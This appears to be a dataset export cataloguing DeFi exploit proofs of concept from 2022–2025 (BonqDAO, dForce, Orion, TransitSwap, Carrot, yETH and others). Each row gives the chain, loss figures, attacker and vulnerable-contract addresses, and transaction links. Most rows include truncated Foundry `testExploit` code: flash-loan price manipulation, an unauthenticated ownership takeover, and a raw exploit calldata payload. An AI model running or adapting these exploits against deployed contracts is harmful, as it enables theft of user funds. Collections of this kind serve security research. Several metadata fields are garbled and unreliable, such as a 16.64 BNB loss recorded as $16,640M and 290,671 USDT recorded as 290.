source_code
stringlengths
878
31.2k
type
stringclasses
1 value
protocol
stringlengths
2
33
date
stringclasses
70 values
file_name
stringlengths
10
41
attack_vector
stringclasses
4 values
content_hash
stringlengths
16
16
collected_at
stringdate
2026-01-07 10:59:16
2026-01-07 10:59:16
_source
stringclasses
1 value
chain
stringclasses
8 values
block_number
int64
1.11M
356M
total_lost_raw
stringlengths
3
127
total_lost_usd
float64
0
19,026B
attacker_address
stringlengths
65
82
attack_contract
stringlengths
70
89
vulnerable_contract
stringlengths
68
82
attack_tx
stringlengths
89
115
postmortem_url
stringclasses
85 values
twitter_url
stringlengths
48
62
has_keyinfo
bool
2 classes
has_analysis
bool
2 classes
has_attack_vector
bool
2 classes
severity
stringclasses
4 values
severity_raw
stringlengths
3
127
category
stringclasses
5 values
exploit_code
stringlengths
0
25.5k
has_exploit_code
bool
2 classes
keyinfo_total_lost
stringlengths
0
127
keyinfo_attacker
stringlengths
0
82
keyinfo_attack_contract
stringlengths
0
89
keyinfo_vulnerable_contract
stringlengths
0
82
keyinfo_attack_tx
stringlengths
0
115
analysis_postmortem
stringclasses
82 values
analysis_twitter
stringlengths
0
62
funds_lost_formatted
stringlengths
2
13
content_richness_score
float64
0.63
10
quality_estimate
stringclasses
3 values
title
stringlengths
20
51
has_total_lost
bool
2 classes
has_vulnerable_contract
bool
2 classes
has_attack_tx
bool
2 classes
has_postmortem
bool
2 classes
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/BlockSecTeam/status/1623999717482045440 // https://twitter.com/BlockSecTeam/status/1624077078852210691 // @TX // https://bscscan.com/tx/0x61293c6dd5211a98f1a26c...
exploit_poc
Sheep
2023-02
Sheep_exp.sol
flash_loan
fec99f81beef49a4
2026-01-07T10:59:16.515269
postmortems
bsc
25,543,755
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
function testExploit() public { DVM(dodo).flashLoan(380 * 1e18, 0, address(this), new bytes(1)); emit log_named_decimal_uint("Attacker WBNB balance after exploit", WBNB.balanceOf(address(this)), 18); }
true
Unknown
4.32
low
Sheep Exploit (2023-02)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.17; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo // Total Lost : BEUR stablecoin and ALBT token (~88MUS$) // |_ 100,514,098.3407 BEUR from BonqDAO protocol // |_ 113,813,998.3698 ALBT from BonqDAO's borrowers // Attacker: 0xcAcf2...
exploit_poc
BonqDAO
2023-02
BonqDAO_exp.sol
oracle_manipulation
1b16549a68b78baa
2026-01-07T10:59:16.515361
postmortems
polygon
38,792,977
BEUR stablecoin and ALBT token (~88MUS$)
88,000,000
null
null
null
null
null
null
true
true
true
critical
BEUR stablecoin and ALBT token (~88MUS$)
oracle-manipulation
function testExploit() public { // Full simulation, run Tx1 and Tx2 vm.createSelectFork("polygon", 38_792_977); exploit = new Exploit(); // Pre-works, check out: https://polygonscan.com/address/0xed596991ac5f1aa1858da66c67f7cfa76e54b5f1#tokentxns deal(address(TRB), address(explo...
true
$88.00M
7
medium
BonqDAO Exploit (2023-02)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.13; import "forge-std/Test.sol"; // analysis // https://blog.verichains.io/p/analyzing-the-lz-token-hack // https://twitter.com/immunefi/status/1630210901360951296 // https://bscscan.com/tx/0xaee8ef10ac816834cd7026ec34f35bdde568191fe2fa67724fcf2739e48c3cae e...
exploit_poc
LaunchZone
2023-02
LaunchZone_exp.sol
null
0bdce8584698f823
2026-01-07T10:59:16.515494
postmortems
bsc
26,024,420
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { console.log("Running on BSC at : ", block.number); console.log("BscexDeployer LZ Balalnce", LZ.balanceOf(BscexDeployer)); console.log("LZ allowance to swapXImp", LZ.allowance(BscexDeployer, swapXImp) / 1e18); // lazy payload check the previous swapX PoC...
true
Unknown
5
medium
LaunchZone Exploit (2023-02)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/SlowMist_Team/status/1623956763598000129 // https://twitter.com/BlockSecTeam/status/1623901011680333824 // https://twitter.com/peckshield/status/162391025703361...
exploit_poc
dForce
2023-02
dForce_exp.sol
flash_loan
8eeccca9c1aa73b1
2026-01-07T10:59:16.515564
postmortems
arbitrum
59,527,633
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
function testExploit() public { borrower = new Borrower(); payable(address(0x0)).transfer(address(this).balance); WSTETH.approve(address(curvePool), type(uint256).max); WSTETHCRV.approve(address(curvePool), type(uint256).max); balancerFlashloan(); USX.approve(address(curv...
true
Unknown
6
medium
dForce Exploit (2023-02)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/BlockSecTeam/status/1628319536117153794 // https://twitter.com/BeosinAlert/status/1628301635834486784 // @TX // https://bscscan.com/tx/0x06bbe093d9b84783b8ca92a...
exploit_poc
DYNA
2023-02
DYNA_exp.sol
flash_loan
975825a075331b43
2026-01-07T10:59:16.515659
postmortems
bsc
25,879,486
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
false
Unknown
3.3
low
DYNA Exploit (2023-02)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.17; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analsysi // https://twitter.com/peckshield/status/1621337925228306433 // https://twitter.com/BlockSecTeam/status/1621263393054420992 // https://www.numencyber.com/analysis-of-orionprotocol-reen...
exploit_poc
Orion
2023-02
Orion_exp.sol
reentrancy
4a140cf34f463f0f
2026-01-07T10:59:16.515714
postmortems
ethereum
16,542,147
null
null
null
null
null
null
null
null
false
false
true
medium
null
reentrancy
function testExploit() public { deal(address(USDT), address(this), 1e6); // set the USDT balance of exploiter is 1 deal(address(USDC), address(this), 1e6); // set the USDC balance of exploiter is 1 ATK = new ATKToken(address(this)); addLiquidity(); address(USDT).call(abi.encodeW...
true
Unknown
6
medium
Orion Exploit (2023-02)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://mirror.xyz/revertfinance.eth/3sdpQ3v9vEKiOjaHXUi3TdEfhleAXXlAEWeODrRHJtU // @TX // https://etherscan.io/tx/0xdaccbc437cb07427394704fbcc8366589ffccf974ec6524f3483844b043f31d...
exploit_poc
RevertFinance
2023-02
RevertFinance_exp.sol
null
f4e6da616ff08a2e
2026-01-07T10:59:16.515775
postmortems
ethereum
16,653,389
null
null
null
null
null
null
null
null
false
true
false
medium
null
unknown
false
Unknown
1.5
low
RevertFinance Exploit (2023-02)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "forge-std/console.sol"; // @Analysis // https://twitter.com/danielvf/status/1621965412832350208 // https://medium.com/sperax/usds-feb-3-exploit-report-from-engineering-team-9f0fd3cef00c // @TX // https://arbiscan.io/t...
exploit_poc
USDs
2023-02
USDs_exp.sol
null
a917712186ac7d36
2026-01-07T10:59:16.515819
postmortems
arbitrum
57,803,529
null
null
null
null
null
null
null
null
false
true
false
medium
null
unknown
function testExploit() public { usds.transfer(ATTACKER_CONTRACT, 11e18); // Etch code. In the real hack this was a Gnosis Safe being deployed vm.etch(ATTACKER_CONTRACT, bytes("code")); // Trigger balance recalculation vm.prank(ATTACKER_CONTRACT); usds.transfer(address(t...
true
Unknown
2.83
low
USDs Exploit (2023-02)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/NumenAlert/status/1626447469361102850 // https://twitter.com/bbbb/status/1626392605264351235 // @TX // https://bscscan.com/tx/0x146586f05a4513136deab3557ad15df8...
exploit_poc
Starlink
2023-02
Starlink_exp.sol
flash_loan
0f0046b2846d4dcc
2026-01-07T10:59:16.515856
postmortems
bsc
25,729,304
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
function testExploit() public { dodoFlashAmount1 = WBNB.balanceOf(dodo1); DVM(dodo1).flashLoan(dodoFlashAmount1, 0, address(this), new bytes(1)); emit log_named_decimal_uint("Attacker WBNB balance after exploit", WBNB.balanceOf(address(this)), 18); }
true
Unknown
4.65
low
Starlink Exploit (2023-02)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.0; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/peckshield/status/1630490333716029440 // https://twitter.com/drdr_zz/status/1630500170373685248 // https://twitter.com/gbaleeeee/status/1630587522698080257 // @T...
exploit_poc
EFVault
2023-02
EFVault_exp.sol
null
7009d9073b2099ae
2026-01-07T10:59:16.515899
postmortems
ethereum
16,696,239
null
null
null
null
null
null
null
null
false
true
false
medium
null
unknown
false
Unknown
0.63
low
EFVault Exploit (2023-02)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/peckshield/status/1626493024879673344 // @TX // https://etherscan.io/tx/0x138daa4cbeaa3db42eefcec26e234fc2c89a4aa17d6b1870fc460b2856fd11a6 // https://twitter.co...
exploit_poc
Dexible
2023-02
Dexible_exp.sol
null
a03d546e9b624a28
2026-01-07T10:59:16.515939
postmortems
ethereum
16,646,022
null
null
null
null
null
null
null
null
false
true
false
medium
null
unknown
false
Unknown
1.5
low
Dexible Exploit (2023-02)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/BlockSecTeam/status/1630111965942018049 // https://twitter.com/peckshield/status/1630100506319413250 // @TX // https://bscscan.com/tx/0x3ee23c1585474eaa4f976313...
exploit_poc
SwapX
2023-02
SwapX_exp.sol
null
38ad235cb5198ef0
2026-01-07T10:59:16.515987
postmortems
bsc
26,023,088
null
null
null
null
null
null
null
null
false
true
false
medium
null
unknown
false
Unknown
1.69
low
SwapX Exploit (2023-02)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analsis // https://twitter.com/peckshield/status/1626367531480125440 // https://twitter.com/spreekaway/status/1626319585040338953 // @TX // https://snowtrace.io/tx/0x1266a937c2ccd970e5d7929021...
exploit_poc
Platypus
2023-02
Platypus_exp.sol
flash_loan
75a6e4d5decc65a0
2026-01-07T10:59:16.516032
postmortems
avalanche
26,343,613
null
null
null
null
null
null
null
null
false
false
true
medium
null
flash-loan
false
Unknown
4
low
Platypus Exploit (2023-02)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/MevRefund/status/1622793836291407873 // https://twitter.com/peckshield/status/1622801412727148544 // @TX // https://etherscan.io/tx/0x90b468608fbcc7faef46502b19...
exploit_poc
CowSwap
2023-02
CowSwap_exp.sol
null
bfcb07c4ecb015af
2026-01-07T10:59:16.516091
postmortems
ethereum
16,574,048
null
null
null
null
null
null
null
null
false
true
false
medium
null
unknown
false
Unknown
1.22
low
CowSwap Exploit (2023-02)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; interface IQBridge { function deposit(uint8 destinationDomainID, bytes32 resourceID, bytes calldata data) external payable; } interface IQBridgeHandler { // mapping(address => bool) public...
exploit_poc
Qubit
2022-01
Qubit_exp.sol
null
24ae87ced5df0bdb
2026-01-07T10:59:16.516134
postmortems
unknown
14,090,169
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { cheat.startPrank(attacker); // emit log_named_uint( // "Before exploiting, attacker OP Balance:", // op.balanceOf(0x0A0805082EA0fc8bfdCc6218a986efda6704eFE5) // ); bytes32 resourceID = hex"00000000000000000000002f422fe9ea622049d6f73f81a...
true
Unknown
3.26
low
Qubit Exploit (2022-01)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; contract ContractTest is Test { address WETH_Address = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2; CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D); AnyswapV4R...
exploit_poc
Anyswap
2022-01
Anyswap_exp.sol
null
5800ab98fff77192
2026-01-07T10:59:16.516180
postmortems
ethereum
14,037,236
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExample() public { //https://etherscan.io/tx/0xe50ed602bd916fc304d53c4fed236698b71691a95774ff0aeeb74b699c6227f7 // anySwapOutUnderlyingWithPermit( // address from, // address token, // address to, // uint amount, // uint deadlin...
true
Unknown
3.06
low
Anyswap Exploit (2022-01)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "forge-std/interfaces/IERC20.sol"; // @KeyInfo - Total Lost : 9M USD // Attacker : 0xfb63aa935cf0a003335dce9cca03c4f9c0fa4779 // Attack Contract : 0xbb2789b418fa18f9526ba79fa7038d4e6d753f73 // Vulnerable Contract : 0xCcd0...
exploit_poc
yETH
2025-12
yETH_exp.sol
flash_loan
225099b54c2dbd1c
2026-01-07T10:59:16.516229
postmortems
unknown
null
9M USD
9,000,000
null
null
null
null
null
null
true
false
true
critical
9M USD
flash-loan
function testExploit() public balanceLog { _setupInitialBalances(); _initialRateUpdate(); _executeExploitSequence(); //Take back assets from flashloan to get actual profit _takeInitialsBack(); }
true
9M USD
$9.00M
8
high
yETH Exploit (2025-12)
true
false
false
false
//SPDX-License-Identifier: MIT pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // Report https://twitter.com/CertiKAlert/status/1576195971003858944 // Attacker : 0x08e08f4b701d33c253ad846868424c1f3c9a4db3 // Attack Contract : 0x5EfD021Ab403B5b6bBD30fd2E3C26f83f03163d4 // Vulnerable ...
exploit_poc
RL
2022-10
RL_exp.sol
flash_loan
12e7f7e95046e55a
2026-01-07T10:59:16.516302
postmortems
bsc
21,794,289
null
null
null
null
https://bscscan.com/address/0x4bbfae575dd47bcfd5770ab4bc54eb83db088888
null
null
null
false
false
true
medium
null
flash-loan
false
https://bscscan.com/address/0x4bbfae575dd47bcfd5770ab4bc54eb83db088888
Unknown
5.34
medium
RL Exploit (2022-10)
false
true
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.17; import "forge-std/Test.sol"; // Total Lost: $180k // Attacker: 0x4206d62305d2815494dcdb759c4e32fca1d181a0 // Attack Contract: 0xEb4c67E5BE040068FA477a539341d6aeF081E4Eb // Vulnerable Contract: 0x3dC7E6FF0fB79770FA6FB05d1ea4deACCe823943 // Attack Tx: http...
exploit_poc
Market
2022-10
Market_exp.sol
flash_loan
21cbd126063dd9ee
2026-01-07T10:59:16.516360
postmortems
polygon
34,716,800
$180k
180,000
null
null
null
https://phalcon.blocksec.com/tx/polygon/0xb8efe839da0c89daa763f39f30577dc21937ae351c6f99336a0017e63d387558
null
null
false
false
true
high
$180k
flash-loan
false
https://phalcon.blocksec.com/tx/polygon/0xb8efe839da0c89daa763f39f30577dc21937ae351c6f99336a0017e63d387558
$180.0K
7
medium
Market Exploit (2022-10)
true
false
true
false
//SPDX-License-Identifier: MIT pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/BeosinAlert/status/1582181583343484928 // TX // https://bscscan.com/tx/0x8385625e9d8011f4ad5d023d64dc7985f0315b6a4be37424c7212fe4c10dafe0 contract ContractTest is Test...
exploit_poc
PLTD
2022-10
PLTD_exp.sol
flash_loan
1754262cd617cff7
2026-01-07T10:59:16.516439
postmortems
bsc
22,252,045
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
false
Unknown
2.29
low
PLTD Exploit (2022-10)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~250k US$ which resulted in ~50k profit // Attacker : 0x056c20ab7e25e4dd7e49568f964d98e415da63d3 // Attack Contract : 0x8523c7661850d0da4d86587ce9674da23369ff26 // Vulne...
exploit_poc
ULME
2022-10
ULME_exp.sol
flash_loan
e6e7699f62609c65
2026-01-07T10:59:16.516488
postmortems
unknown
22,476,695
~250k US$ which resulted in ~50k profit
250,000
null
null
null
https://phalcon.blocksec.com/tx/bsc/0xdb9a13bc970b97824e082782e838bdff0b76b30d268f1d66aac507f1d43ff4ed
null
null
true
true
true
high
~250k US$ which resulted in ~50k profit
flash-loan
false
~250k US$ which resulted in ~50k profit
https://phalcon.blocksec.com/tx/bsc/0xdb9a13bc970b97824e082782e838bdff0b76b30d268f1d66aac507f1d43ff4ed
$250.0K
7
medium
ULME Exploit (2022-10)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~187.75 WETH // Attacker : 0x1dc90b5b7FE74715C2056e5158641c0af7d28865 // Attack Contract : https://etherscan.io/address/0x4b77c789fa35b54dacb5f6bb2daaa01554299d6c // Vul...
exploit_poc
MEVa47b
2022-10
MEVa47b_exp.sol
flash_loan
7a80787511256b1e
2026-01-07T10:59:16.516569
postmortems
ethereum
15,741,332
~187.75 WETH
187.75
null
https://etherscan.io/address/0x4b77c789fa35b54dacb5f6bb2daaa01554299d6c
https://etherscan.io/address/0x00000000000a47b1298f18cf67de547bbe0d723f#code
https://etherscan.io/tx/0x35ecf595864400696853c53edf3e3d60096639b6071cadea6076c9c6ceb921c1
null
null
true
true
true
low
~187.75 WETH
flash-loan
function testExploit() public { emit log_named_decimal_uint( "\n[Start] Attacker WETH balance before exploit", WETH_TOKEN.balanceOf(address(this)), 18 ); address[] memory tokens = new address[](1); tokens[0] = address(WETH_TOKEN); uint256[] memory amounts = new uint2...
true
~187.75 WETH
https://etherscan.io/address/0x4b77c789fa35b54dacb5f6bb2daaa01554299d6c
https://etherscan.io/address/0x00000000000a47b1298f18cf67de547bbe0d723f#code
https://etherscan.io/tx/0x35ecf595864400696853c53edf3e3d60096639b6071cadea6076c9c6ceb921c1
$188
10
high
MEVa47b Exploit (2022-10)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/AnciliaInc/status/1587848874076430336 // @Address // https://bscscan.com/txs?a=0xb12011c14e087766f30f4569ccaf735ec2182165 interface Bond { function buyBond...
exploit_poc
INUKO
2022-10
INUKO_exp.sol
flash_loan
8947dc92ee92ddd1
2026-01-07T10:59:16.516631
postmortems
bsc
22,169,169
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
function testExploit() public payable { address(WBNB).call{value: 5 ether}(""); // add LP addLiquidity(); // FlashLoan manipulate price, then buy bond buyBond(); // change time pass time check , claim reward cheats.warp(block.timestamp + 3 * 24 * 60 * 60); ...
true
Unknown
6
medium
INUKO Exploit (2022-10)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : 290,671 USDT // Attacker : 0x986b2e2a1cf303536138d8ac762447500fd781c6 // Attack Contract : https://bscscan.com/address/0xFf333DE02129AF88aAe101ab777d3f5D709FeC6f // Vuln...
exploit_poc
RES
2022-10
RES_exp.sol
flash_loan
47d3a9d6be9df03e
2026-01-07T10:59:16.516703
postmortems
bsc
21,948,016
290,671 USDT
290
null
https://bscscan.com/address/0xFf333DE02129AF88aAe101ab777d3f5D709FeC6f
https://bscscan.com/address/0xeccd8b08ac3b587b7175d40fb9c60a20990f8d21
null
null
null
true
true
true
low
290,671 USDT
flash-loan
function testExploit() public { emit log_named_decimal_uint( "[Start] Attacker USDT balance before exploit", USDT_TOKEN.balanceOf(address(this)), 18 ); USDT_WBNB_PAIR.swap(10_014_120_886_666_860_414_836_616, 0, address(this), "borrowusdt"); emit log_named_decimal_uint( ...
true
290,671 USDT
https://bscscan.com/address/0xFf333DE02129AF88aAe101ab777d3f5D709FeC6f
https://bscscan.com/address/0xeccd8b08ac3b587b7175d40fb9c60a20990f8d21
$290
9
high
RES Exploit (2022-10)
true
true
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : // Attacker : 0xd11a93a8db5f8d3fb03b88b4b24c3ed01b8a411c // Attack Contract : https://bscscan.com/address/0x5575406ef6b15eec1986c412b9fbe144522c45ae // Vulnerable Contra...
exploit_poc
Carrot
2022-10
Carrot_exp.sol
access_control
e80c60e08c1ef8d2
2026-01-07T10:59:16.516776
postmortems
bsc
22,055,611
// Attacker : 0xd11a93a8db5f8d3fb03b88b4b24c3ed01b8a411c
0
null
https://bscscan.com/address/0x5575406ef6b15eec1986c412b9fbe144522c45ae
https://bscscan.com/address/0xcFF086EaD392CcB39C49eCda8C974ad5238452aC
https://bscscan.com/tx/0xa624660c29ee97f3f4ebd36232d8199e7c97533c9db711fa4027994aa11e01b9
null
null
true
true
true
low
// Attacker : 0xd11a93a8db5f8d3fb03b88b4b24c3ed01b8a411c
access-control
function testExploit() public { emit log_named_decimal_uint( "[Start] Attacker BUSDT balance before exploit", BUSDT_TOKEN.balanceOf(address(this)), 18 ); // Call vulnerable transReward() to set this contract as owner. No auth control CARROT_TOKEN.transReward(abi.encodeWithSe...
true
//
https://bscscan.com/address/0x5575406ef6b15eec1986c412b9fbe144522c45ae
https://bscscan.com/address/0xcFF086EaD392CcB39C49eCda8C974ad5238452aC
https://bscscan.com/tx/0xa624660c29ee97f3f4ebd36232d8199e7c97533c9db711fa4027994aa11e01b9
Unknown
8.87
high
Carrot Exploit (2022-10)
false
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~127K BUSDT // Attacker : 0x3DF6cd58716d22855aFb3B828F82F10708AfbB4f // Attack Contract : https://bscscan.com/address/0xd7ba198ce82f4c46ad8f6148ccfdb41866750231 // Vulne...
exploit_poc
ATK
2022-10
ATK_exp.sol
null
2b745891194ddf63
2026-01-07T10:59:16.516843
postmortems
bsc
22,102,838
~127K BUSDT
127,000
null
https://bscscan.com/address/0xd7ba198ce82f4c46ad8f6148ccfdb41866750231
https://bscscan.com/address/0x9cb928bf50ed220ac8f703bce35be5ce7f56c99c
null
null
null
true
true
false
high
~127K BUSDT
unknown
function testExploit() public { emit log_named_decimal_uint( "[Start] Attacker ATK balance before exploit", ATK_TOKEN.balanceOf(EXPLOIT_CONTRACT), 18 ); WBNB_TOKEN.deposit{value: 2 ether}(); _WBNBToBUSDT(); swapamount = BUSDT_TOKEN.balanceOf(address(ATK_BUSDT_PAIR))...
true
~127K BUSDT
https://bscscan.com/address/0xd7ba198ce82f4c46ad8f6148ccfdb41866750231
https://bscscan.com/address/0x9cb928bf50ed220ac8f703bce35be5ce7f56c99c
$127.0K
7.12
medium
ATK Exploit (2022-10)
true
true
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$292K (30,437 OHM) // Attacker : 0x443cf223e209e5a2c08114a2501d8f0f9ec7d9be // Attack Contract : 0xa29e4fe451ccfa5e7def35188919ad7077a4de8f // Vulnerable Contract : 0x0...
exploit_poc
OlympusDao
2022-10
OlympusDao_exp.sol
null
5bac4df343e5f025
2026-01-07T10:59:16.516893
postmortems
ethereum
15,794,363
~$292K (30,437 OHM)
292,000
null
null
null
https://etherscan.io/tx/0x3ed75df83d907412af874b7998d911fdf990704da87c2b1a8cf95ca5d21504cf
null
null
true
true
false
high
~$292K (30,437 OHM)
unknown
function testExploit() public { console.log("---------- Start from block %s ----------", block.number); emit log_named_decimal_uint("Attacker OHM balance", IERC20(OHM).balanceOf(address(this)), 9); address fakeToken = address(new FakeToken()); uint256 ohmBalance = IERC20(OHM).balanceOf...
true
~$292K (30,437 OHM)
https://etherscan.io/tx/0x3ed75df83d907412af874b7998d911fdf990704da87c2b1a8cf95ca5d21504cf
$292.0K
6.11
medium
OlympusDao Exploit (2022-10)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/BlockSecTeam/status/1585575129936977920 // https://twitter.com/peckshield/status/1585572694241988609 // https://twitter.com/BeosinAlert/status/15855870309812183...
exploit_poc
VTF
2022-10
VTF_exp.sol
flash_loan
406d6da4ec2634e6
2026-01-07T10:59:16.516933
postmortems
bsc
22,535,101
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
function testExploit() public { contractFactory(); // change time to pass time check cheat.warp(block.timestamp + 2 * 24 * 60 * 60); DVM(dodo).flashLoan(0, 100_000 * 1e18, address(this), new bytes(1)); emit log_named_decimal_uint("[End] Attacker USDT balance after exploit", USDT...
true
Unknown
4.96
low
VTF Exploit (2022-10)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~16.64 BNB // Attacker : 0xDE78112FF006f166E4ccfe1dfE4181C9619D3b5D // Attack Contract : 0x80e5FC0d72e4814cb52C16A18c2F2B87eF1Ea2d4 // Vulnerable Contract : 0x32B166e082...
exploit_poc
HEALTH
2022-10
HEALTH_exp.sol
flash_loan
ffb3077db642dcd8
2026-01-07T10:59:16.516979
postmortems
bsc
22,337,425
~16.64 BNB
16,640,000,000
null
null
null
https://bscscan.com/tx/0xae8ca9dc8258ae32899fe641985739c3fa53ab1f603973ac74b424e165c66ccf
null
null
true
true
true
critical
~16.64 BNB
flash-loan
function testExploit() public { emit log_named_decimal_uint( "[Start] Attacker WBNB balance before exploit", WBNB_TOKEN.balanceOf(address(this)), 18 ); // Approving PancakeSwap router to spend attacker's WBNB and HEALTH WBNB_TOKEN.approve(address(PS_ROUTER), type(uint256).ma...
true
~16.64 BNB
https://bscscan.com/tx/0xae8ca9dc8258ae32899fe641985739c3fa53ab1f603973ac74b424e165c66ccf
$16640.00M
8.08
high
HEALTH Exploit (2022-10)
true
false
true
false
// SPDX-License-Identifier: GPL-3.0 pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : over $21 Million // Attacker : 0x5f0b31AA37Bce387a8b21554a8360C6B8698FbEF // Attack Contract : https://bscscan.com/address/0x8CA8fD9C7641849A14CbF72FaF05c305B0c68a34 // Vul...
exploit_poc
TransitSwap
2022-10
TransitSwap_exp.sol
null
bc6fbd0441dfaa80
2026-01-07T10:59:16.517036
postmortems
bsc
21,816,545
over $21 Million
21,000,000
null
https://bscscan.com/address/0x8CA8fD9C7641849A14CbF72FaF05c305B0c68a34
https://bscscan.com/address/0x8785bb8deAE13783b24D7aFE250d42eA7D7e9d72
https://bscscan.com/tx/0x181a7882aac0eab1036eedba25bc95a16e10f61b5df2e99d240a16c334b9b189
null
null
true
true
false
critical
over $21 Million
unknown
function testExploit() public { emit log_named_decimal_uint( "[Start] Attacker USDT balance before exploit", BUSDT_TOKEN.balanceOf(address(this)), 18 ); (bool success,) = TRANSIT_SWAP.call( hex"006de4df000000000000000000000000000000000000000000000000000000000000000100000...
true
over $21 Million
https://bscscan.com/address/0x8CA8fD9C7641849A14CbF72FaF05c305B0c68a34
https://bscscan.com/address/0x8785bb8deAE13783b24D7aFE250d42eA7D7e9d72
https://bscscan.com/tx/0x181a7882aac0eab1036eedba25bc95a16e10f61b5df2e99d240a16c334b9b189
$21.00M
8.6
high
TransitSwap Exploit (2022-10)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo // Attacker : 0x0000000038b8889b6ab9790e20FC16fdC5714922 // Attack Contract : https://bscscan.com/address/0xde7e741bd9dc7209b56f1ef3b663efb288c928d4 // Vulnerable Contract : https://bs...
exploit_poc
BabySwap
2022-10
BabySwap_exp.sol
null
16a6366093079df0
2026-01-07T10:59:16.517095
postmortems
bsc
21,811,979
null
null
null
https://bscscan.com/address/0xde7e741bd9dc7209b56f1ef3b663efb288c928d4
https://bscscan.com/address/0x5c9f1A9CeD41cCC5DcecDa5AFC317b72f1e49636
https://bscscan.com/tx/0xcca7ea9d48e00e7e32e5d005b57ec3cac28bc3ad0181e4ca208832e62aa52efe
null
null
true
true
false
medium
null
unknown
function testExploit() public { emit log_named_decimal_uint( "[Start] Attacker USDT balance before exploit", USDT_TOKEN.balanceOf(address(this)), 18 ); (bool success,) = address(WBNB_TOKEN).call{value: 20_000}(""); require(success, "Transfer failed."); WBNB_TOKEN.appr...
true
https://bscscan.com/address/0xde7e741bd9dc7209b56f1ef3b663efb288c928d4
https://bscscan.com/address/0x5c9f1A9CeD41cCC5DcecDa5AFC317b72f1e49636
https://bscscan.com/tx/0xcca7ea9d48e00e7e32e5d005b57ec3cac28bc3ad0181e4ca208832e62aa52efe
Unknown
7.66
medium
BabySwap Exploit (2022-10)
false
true
true
false
